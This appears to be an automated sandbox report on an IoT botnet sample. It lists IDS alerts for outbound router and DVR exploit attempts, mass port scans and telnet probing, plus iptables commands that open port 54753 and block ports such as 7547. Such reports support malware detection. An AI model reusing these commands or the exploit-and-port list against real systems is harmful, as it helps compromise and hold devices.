Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59348 -> 95.217.3.9:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38708 -> 204.85.28.95:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38708 -> 204.85.28.95:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36964 -> 47.96.100.38:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36964 -> 47.96.100.38:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40456 -> 35.201.127.68:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40456 -> 35.201.127.68:8080
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 193.136.134.150: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 163.28.1.241: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.93.139: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.183.25.195: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44746 -> 220.130.214.100:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:34312 -> 121.5.104.125:80
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 46.254.1.124 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 217.196.154.24 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 77.190.22.139 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 26.95.223.242 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 34.46.25.239 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 138.94.203.237 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 160.49.32.226 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 92.171.56.228 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 82.134.248.77 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 199.218.221.131 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 159.162.153.137 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 26.139.153.168 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 142.143.222.228 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 14.106.178.189 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 129.177.173.85 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 158.130.170.201 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.57.154.59 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 180.142.151.223 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 70.83.19.226 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 148.228.211.150 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 218.1.134.21 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 181.215.101.174 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 6.158.170.206 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 85.124.222.42 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 165.94.66.173 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 84.49.20.203 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 126.241.242.120 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 148.53.105.39 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 163.224.207.250 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 47.83.189.211 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 186.149.104.105 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 105.109.18.186 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 83.190.231.93 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.203.125.76 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 96.186.107.158 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 113.37.245.122 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 94.202.222.110 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 29.5.215.81 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 132.228.243.137 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 77.188.2.23 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 160.116.99.47 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 24.87.139.212 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 204.7.247.28 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 137.33.28.160 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 113.237.9.87 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 4.122.58.30 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 174.9.64.0 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 56.89.187.128 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 182.150.145.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 180.195.241.242 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 61.67.234.110 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 189.124.245.91 ports 1,2,3,5,7,37215
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4616) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4650) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4653) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4716) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4736) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4748) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4796) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4805) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4829) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4878) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4906) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4926) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4931) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4947) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4974) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5000) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5025) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5034) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5057) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5087) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5117) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5120) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5127) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5152) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5182) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5231) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5234) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 47738 -> 8443
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:34160 -> 140.39.206.54:81
Source: global traffic TCP traffic: 192.168.2.20:60110 -> 108.39.69.131:8443
Source: global traffic TCP traffic: 192.168.2.20:47760 -> 131.99.110.247:81
Source: global traffic TCP traffic: 192.168.2.20:38738 -> 3.51.62.125:8080
Source: global traffic TCP traffic: 192.168.2.20:33152 -> 28.86.70.243:8443
Source: global traffic TCP traffic: 192.168.2.20:52282 -> 171.112.221.128:8080
Source: global traffic TCP traffic: 192.168.2.20:38246 -> 85.117.188.205:8080
Source: global traffic TCP traffic: 192.168.2.20:45272 -> 105.109.18.186:49152
Source: global traffic TCP traffic: 192.168.2.20:43144 -> 29.5.215.81:37215
Source: global traffic TCP traffic: 192.168.2.20:35236 -> 8.114.30.17:8443
Source: global traffic TCP traffic: 192.168.2.20:39800 -> 4.186.238.93:7574
Source: global traffic TCP traffic: 192.168.2.20:48414 -> 85.124.222.42:49152
Source: global traffic TCP traffic: 192.168.2.20:57344 -> 13.229.32.133:7574
Source: global traffic TCP traffic: 192.168.2.20:33480 -> 138.94.203.237:49152
Source: global traffic TCP traffic: 192.168.2.20:60366 -> 84.219.17.176:8080
Source: global traffic TCP traffic: 192.168.2.20:60856 -> 165.94.66.173:49152
Source: global traffic TCP traffic: 192.168.2.20:42290 -> 163.60.176.218:8443
Source: global traffic TCP traffic: 192.168.2.20:59730 -> 174.9.64.0:37215
Source: global traffic TCP traffic: 192.168.2.20:50870 -> 217.196.154.24:52869
Source: global traffic TCP traffic: 192.168.2.20:38960 -> 43.162.206.133:7574
Source: global traffic TCP traffic: 192.168.2.20:34734 -> 79.58.62.70:8080
Source: global traffic TCP traffic: 192.168.2.20:54256 -> 180.195.241.242:49152
Source: global traffic TCP traffic: 192.168.2.20:55482 -> 113.203.125.76:49152
Source: global traffic TCP traffic: 192.168.2.20:33332 -> 124.94.21.94:8443
Source: global traffic TCP traffic: 192.168.2.20:53384 -> 125.178.212.248:81
Source: global traffic TCP traffic: 192.168.2.20:52468 -> 181.215.101.174:49152
Source: global traffic TCP traffic: 192.168.2.20:59820 -> 146.97.112.184:8080
Source: global traffic TCP traffic: 192.168.2.20:56094 -> 113.237.9.87:37215
Source: global traffic TCP traffic: 192.168.2.20:38442 -> 65.192.2.39:7574
Source: global traffic TCP traffic: 192.168.2.20:60092 -> 83.106.49.27:81
Source: global traffic TCP traffic: 192.168.2.20:56100 -> 100.221.5.250:8443
Source: global traffic TCP traffic: 192.168.2.20:57922 -> 74.164.3.48:7574
Source: global traffic TCP traffic: 192.168.2.20:39938 -> 70.83.19.226:52869
Source: global traffic TCP traffic: 192.168.2.20:55898 -> 121.204.171.153:8443
Source: global traffic TCP traffic: 192.168.2.20:49652 -> 61.114.5.135:8443
Source: global traffic TCP traffic: 192.168.2.20:59844 -> 219.13.241.116:81
Source: global traffic TCP traffic: 192.168.2.20:42368 -> 221.79.66.124:8443
Source: global traffic TCP traffic: 192.168.2.20:50640 -> 111.176.24.214:7574
Source: global traffic TCP traffic: 192.168.2.20:46158 -> 79.29.184.178:8080
Source: global traffic TCP traffic: 192.168.2.20:38326 -> 158.130.170.201:37215
Source: global traffic TCP traffic: 192.168.2.20:42426 -> 133.39.215.101:7574
Source: global traffic TCP traffic: 192.168.2.20:34400 -> 95.245.196.212:8080
Source: global traffic TCP traffic: 192.168.2.20:41906 -> 15.115.105.212:7574
Source: global traffic TCP traffic: 192.168.2.20:46340 -> 199.218.221.131:49152
Source: global traffic TCP traffic: 192.168.2.20:58966 -> 173.150.244.104:81
Source: global traffic TCP traffic: 192.168.2.20:37704 -> 157.94.79.109:5555
Source: global traffic TCP traffic: 192.168.2.20:44436 -> 137.81.200.232:5555
Source: global traffic TCP traffic: 192.168.2.20:51872 -> 101.196.228.55:81
Source: global traffic TCP traffic: 192.168.2.20:46588 -> 187.188.141.244:81
Source: global traffic TCP traffic: 192.168.2.20:40230 -> 90.205.13.29:8080
Source: global traffic TCP traffic: 192.168.2.20:58940 -> 29.150.145.46:5555
Source: global traffic TCP traffic: 192.168.2.20:41558 -> 92.77.238.132:49152
Source: global traffic TCP traffic: 192.168.2.20:58142 -> 168.120.224.251:7574
Source: global traffic TCP traffic: 192.168.2.20:50236 -> 95.75.250.127:8080
Source: global traffic TCP traffic: 192.168.2.20:32984 -> 196.95.13.165:81
Source: global traffic TCP traffic: 192.168.2.20:54874 -> 167.55.9.142:8080
Source: global traffic TCP traffic: 192.168.2.20:57612 -> 196.37.30.71:8443
Source: global traffic TCP traffic: 192.168.2.20:58382 -> 84.138.43.63:7574
Source: global traffic TCP traffic: 192.168.2.20:53924 -> 150.78.74.139:8080
Source: global traffic TCP traffic: 192.168.2.20:34402 -> 90.251.63.152:8080
Source: global traffic TCP traffic: 192.168.2.20:53456 -> 92.171.56.228:49152
Source: global traffic TCP traffic: 192.168.2.20:36200 -> 152.1.210.168:5555
Source: global traffic TCP traffic: 192.168.2.20:52424 -> 181.63.57.94:7574
Source: global traffic TCP traffic: 192.168.2.20:40720 -> 82.134.248.77:37215
Source: global traffic TCP traffic: 192.168.2.20:34142 -> 186.149.104.105:52869
Source: global traffic TCP traffic: 192.168.2.20:48984 -> 166.120.234.132:81
Source: global traffic TCP traffic: 192.168.2.20:45526 -> 148.53.105.39:37215
Source: global traffic TCP traffic: 192.168.2.20:39264 -> 34.46.25.239:52869
Source: global traffic TCP traffic: 192.168.2.20:53420 -> 122.96.117.78:8443
Source: global traffic TCP traffic: 192.168.2.20:42746 -> 2.24.204.7:5555
Source: global traffic TCP traffic: 192.168.2.20:54634 -> 206.112.48.85:8080
Source: global traffic TCP traffic: 192.168.2.20:35258 -> 221.97.211.57:81
Source: global traffic TCP traffic: 192.168.2.20:51844 -> 132.228.243.137:52869
Source: global traffic TCP traffic: 192.168.2.20:59118 -> 118.33.128.115:8080
Source: global traffic TCP traffic: 192.168.2.20:51128 -> 64.134.176.11:8080
Source: global traffic TCP traffic: 192.168.2.20:43806 -> 148.228.211.150:37215
Source: global traffic TCP traffic: 192.168.2.20:37272 -> 87.76.103.18:8080
Source: global traffic TCP traffic: 192.168.2.20:55578 -> 47.25.134.25:8443
Source: global traffic TCP traffic: 192.168.2.20:46920 -> 191.200.219.2:7574
Source: global traffic TCP traffic: 192.168.2.20:47240 -> 180.142.151.223:49152
Source: global traffic TCP traffic: 192.168.2.20:52002 -> 37.198.54.7:5555
Source: global traffic TCP traffic: 192.168.2.20:58734 -> 14.98.32.156:81
Source: global traffic TCP traffic: 192.168.2.20:39050 -> 47.238.39.43:5555
Source: global traffic TCP traffic: 192.168.2.20:34252 -> 29.198.53.231:8080
Source: global traffic TCP traffic: 192.168.2.20:59336 -> 84.49.20.203:37215
Source: global traffic TCP traffic: 192.168.2.20:39838 -> 86.146.123.31:5555
Source: global traffic TCP traffic: 192.168.2.20:59832 -> 32.217.189.23:7574
Source: global traffic TCP traffic: 192.168.2.20:47362 -> 182.150.145.27:37215
Source: global traffic TCP traffic: 192.168.2.20:42540 -> 37.25.2.203:8443
Source: global traffic TCP traffic: 192.168.2.20:34066 -> 146.53.108.229:7574
Source: global traffic TCP traffic: 192.168.2.20:38360 -> 167.105.144.22:7574
Source: global traffic TCP traffic: 192.168.2.20:60418 -> 132.254.4.175:8443
Source: global traffic TCP traffic: 192.168.2.20:43554 -> 96.186.107.158:52869
Source: global traffic TCP traffic: 192.168.2.20:35612 -> 54.87.34.198:5555
Source: global traffic TCP traffic: 192.168.2.20:45608 -> 24.87.139.212:37215
Source: global traffic TCP traffic: 192.168.2.20:51162 -> 23.95.18.129:7574
Source: global traffic TCP traffic: 192.168.2.20:56194 -> 193.223.49.13:81
Source: global traffic TCP traffic: 192.168.2.20:34122 -> 80.223.16.203:7574
Source: global traffic TCP traffic: 192.168.2.20:37600 -> 149.88.110.90:7574
Source: global traffic TCP traffic: 192.168.2.20:49262 -> 183.182.79.172:7574
Source: global traffic TCP traffic: 192.168.2.20:56704 -> 82.179.61.132:8080
Source: global traffic TCP traffic: 192.168.2.20:52170 -> 185.32.224.106:8080
Source: global traffic TCP traffic: 192.168.2.20:51884 -> 4.122.58.30:37215
Source: global traffic TCP traffic: 192.168.2.20:38142 -> 171.156.169.94:8443
Source: global traffic TCP traffic: 192.168.2.20:50394 -> 189.124.245.91:37215
Source: global traffic TCP traffic: 192.168.2.20:40552 -> 137.33.28.160:52869
Source: global traffic TCP traffic: 192.168.2.20:46764 -> 160.49.32.226:49152
Source: global traffic TCP traffic: 192.168.2.20:49828 -> 77.188.2.23:49152
Source: global traffic TCP traffic: 192.168.2.20:60188 -> 39.70.239.74:8443
Source: global traffic TCP traffic: 192.168.2.20:38156 -> 153.251.110.103:8080
Source: global traffic TCP traffic: 192.168.2.20:37816 -> 6.158.170.206:49152
Source: global traffic TCP traffic: 192.168.2.20:44044 -> 102.239.181.86:8443
Source: global traffic TCP traffic: 192.168.2.20:51112 -> 138.244.0.154:8080
Source: global traffic TCP traffic: 192.168.2.20:50090 -> 56.89.187.128:52869
Source: global traffic TCP traffic: 192.168.2.20:38736 -> 193.74.200.139:8080
Source: global traffic TCP traffic: 192.168.2.20:49988 -> 50.160.226.168:5555
Source: global traffic TCP traffic: 192.168.2.20:32842 -> 93.58.202.130:7574
Source: global traffic TCP traffic: 192.168.2.20:52204 -> 65.114.175.95:81
Source: global traffic TCP traffic: 192.168.2.20:49222 -> 201.144.37.239:7574
Source: global traffic TCP traffic: 192.168.2.20:39886 -> 153.215.244.192:8080
Source: global traffic TCP traffic: 192.168.2.20:55388 -> 177.16.24.154:8080
Source: global traffic TCP traffic: 192.168.2.20:58490 -> 26.139.153.168:37215
Source: global traffic TCP traffic: 192.168.2.20:54464 -> 193.215.254.49:5555
Source: global traffic TCP traffic: 192.168.2.20:45310 -> 9.244.6.205:5555
Source: global traffic TCP traffic: 192.168.2.20:45620 -> 126.17.192.94:8443
Source: global traffic TCP traffic: 192.168.2.20:55314 -> 89.246.214.5:81
Source: global traffic TCP traffic: 192.168.2.20:38496 -> 113.178.32.186:7574
Source: global traffic TCP traffic: 192.168.2.20:42012 -> 22.111.96.211:8443
Source: global traffic TCP traffic: 192.168.2.20:55546 -> 129.177.173.85:52869
Source: global traffic TCP traffic: 192.168.2.20:51724 -> 194.45.74.136:8080
Source: global traffic TCP traffic: 192.168.2.20:52062 -> 217.175.214.110:8080
Source: global traffic TCP traffic: 192.168.2.20:52990 -> 185.57.154.59:49152
Source: global traffic TCP traffic: 192.168.2.20:56420 -> 103.119.246.183:8080
Source: global traffic TCP traffic: 192.168.2.20:56202 -> 210.7.21.57:8080
Source: global traffic TCP traffic: 192.168.2.20:39758 -> 46.254.1.124:52869
Source: global traffic TCP traffic: 192.168.2.20:46990 -> 83.190.231.93:37215
Source: global traffic TCP traffic: 192.168.2.20:39368 -> 24.209.150.53:8080
Source: global traffic TCP traffic: 192.168.2.20:60754 -> 14.106.178.189:52869
Source: global traffic TCP traffic: 192.168.2.20:57620 -> 21.1.86.6:8080
Source: global traffic TCP traffic: 192.168.2.20:54840 -> 29.210.78.250:8080
Source: global traffic TCP traffic: 192.168.2.20:51062 -> 9.214.29.162:8080
Source: global traffic TCP traffic: 192.168.2.20:52094 -> 59.238.28.165:8080
Source: global traffic TCP traffic: 192.168.2.20:33122 -> 23.136.108.3:5555
Source: global traffic TCP traffic: 192.168.2.20:52764 -> 39.150.243.95:8080
Source: global traffic TCP traffic: 192.168.2.20:58240 -> 95.235.124.24:8080
Source: global traffic TCP traffic: 192.168.2.20:37498 -> 162.248.240.36:8080
Source: global traffic TCP traffic: 192.168.2.20:49178 -> 37.192.71.218:8080
Source: global traffic TCP traffic: 192.168.2.20:60294 -> 203.154.69.97:8080
Source: global traffic TCP traffic: 192.168.2.20:44870 -> 26.95.223.242:49152
Source: global traffic TCP traffic: 192.168.2.20:49784 -> 207.209.5.215:81
Source: global traffic TCP traffic: 192.168.2.20:35608 -> 65.18.49.14:5555
Source: global traffic TCP traffic: 192.168.2.20:56108 -> 160.116.99.47:52869
Source: global traffic TCP traffic: 192.168.2.20:57424 -> 207.36.97.217:8080
Source: global traffic TCP traffic: 192.168.2.20:60416 -> 126.241.242.120:37215
Source: global traffic TCP traffic: 192.168.2.20:45724 -> 180.222.24.104:5555
Source: global traffic TCP traffic: 192.168.2.20:34852 -> 1.249.43.22:8080
Source: global traffic TCP traffic: 192.168.2.20:33926 -> 113.37.245.122:49152
Source: global traffic TCP traffic: 192.168.2.20:43820 -> 83.26.49.216:8080
Source: global traffic TCP traffic: 192.168.2.20:53818 -> 218.1.134.21:49152
Source: global traffic TCP traffic: 192.168.2.20:36190 -> 94.202.222.110:52869
Source: global traffic TCP traffic: 192.168.2.20:55414 -> 163.224.207.250:37215
Source: global traffic TCP traffic: 192.168.2.20:50874 -> 165.192.86.199:8080
Source: global traffic TCP traffic: 192.168.2.20:47924 -> 47.97.84.96:5555
Source: global traffic TCP traffic: 192.168.2.20:36000 -> 98.76.121.141:8443
Source: global traffic TCP traffic: 192.168.2.20:56512 -> 5.253.168.79:8080
Source: global traffic TCP traffic: 192.168.2.20:60868 -> 159.199.114.171:7574
Source: global traffic TCP traffic: 192.168.2.20:42254 -> 21.186.96.232:8080
Source: global traffic TCP traffic: 192.168.2.20:52564 -> 63.193.129.128:8080
Source: global traffic TCP traffic: 192.168.2.20:48530 -> 142.143.222.228:49152
Source: global traffic TCP traffic: 192.168.2.20:45344 -> 159.117.140.27:5555
Source: global traffic TCP traffic: 192.168.2.20:43498 -> 159.162.153.137:37215
Source: global traffic TCP traffic: 192.168.2.20:53998 -> 93.191.87.190:8080
Source: global traffic TCP traffic: 192.168.2.20:50786 -> 108.222.27.30:7574
Source: global traffic TCP traffic: 192.168.2.20:56256 -> 69.247.179.164:8080
Source: global traffic TCP traffic: 192.168.2.20:42292 -> 17.188.17.96:8443
Source: global traffic TCP traffic: 192.168.2.20:38076 -> 120.218.153.188:5555
Source: global traffic TCP traffic: 192.168.2.20:40178 -> 177.237.69.156:8443
Source: global traffic TCP traffic: 192.168.2.20:34046 -> 116.13.184.201:8080
Source: global traffic TCP traffic: 192.168.2.20:33188 -> 121.120.108.73:8080
Source: global traffic TCP traffic: 192.168.2.20:51562 -> 18.24.141.168:7574
Source: global traffic TCP traffic: 192.168.2.20:39098 -> 166.55.57.24:8080
Source: global traffic TCP traffic: 192.168.2.20:38220 -> 24.105.81.145:81
Source: global traffic TCP traffic: 192.168.2.20:52676 -> 61.67.234.110:49152
Source: global traffic TCP traffic: 192.168.2.20:46246 -> 124.22.25.41:7574
Source: global traffic TCP traffic: 192.168.2.20:57714 -> 90.85.134.44:81
Source: global traffic TCP traffic: 192.168.2.20:53760 -> 77.25.98.191:81
Source: global traffic TCP traffic: 192.168.2.20:34962 -> 197.167.218.125:8080
Source: global traffic TCP traffic: 192.168.2.20:40784 -> 76.209.219.87:8443
Source: global traffic TCP traffic: 192.168.2.20:46100 -> 69.110.51.44:8443
Source: global traffic TCP traffic: 192.168.2.20:55020 -> 147.139.103.203:7574
Source: global traffic TCP traffic: 192.168.2.20:51804 -> 170.147.88.37:81
Source: global traffic TCP traffic: 192.168.2.20:34932 -> 21.229.198.23:7574
Source: global traffic TCP traffic: 192.168.2.20:32774 -> 47.83.189.211:37215
Source: global traffic TCP traffic: 192.168.2.20:47434 -> 119.97.159.234:81
Source: global traffic TCP traffic: 192.168.2.20:57750 -> 142.66.89.80:8080
Source: global traffic TCP traffic: 192.168.2.20:54354 -> 5.182.95.91:8443
Source: global traffic TCP traffic: 192.168.2.20:50732 -> 204.7.247.28:52869
Source: global traffic TCP traffic: 192.168.2.20:59964 -> 77.190.22.139:49152
Source: global traffic TCP traffic: 192.168.2.20:56096 -> 137.38.149.182:8080
Source: global traffic TCP traffic: 192.168.2.20:35162 -> 173.27.94.3:8080
Source: global traffic TCP traffic: 192.168.2.20:47922 -> 18.119.229.111:5555
Source: global traffic TCP traffic: 192.168.2.20:33810 -> 91.97.247.73:5555
Source: global traffic TCP traffic: 192.168.2.20:41594 -> 71.132.177.20:8080
Source: global traffic TCP traffic: 192.168.2.20:34350 -> 157.100.221.142:7574
Source: global traffic TCP traffic: 192.168.2.20:36164 -> 152.39.226.53:7574
Source: global traffic TCP traffic: 192.168.2.20:37252 -> 25.97.66.170:8080
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 34.30.246.129:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 72.193.100.130:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 191.130.205.66:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 168.204.132.3:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 135.234.161.92:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 112.246.212.82:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.200.2.58:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 110.14.87.91:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 69.122.31.78:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 128.13.11.190:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 63.34.109.151:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 207.13.36.47:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 117.25.72.12:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.218.11.121:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 117.134.250.209:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 58.128.23.30:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 13.201.155.93:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 18.115.11.94:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 156.48.180.246:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 182.202.90.106:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 195.166.0.203:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 184.155.146.118:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 76.87.157.247:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 203.161.28.140:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 106.45.219.74:2323
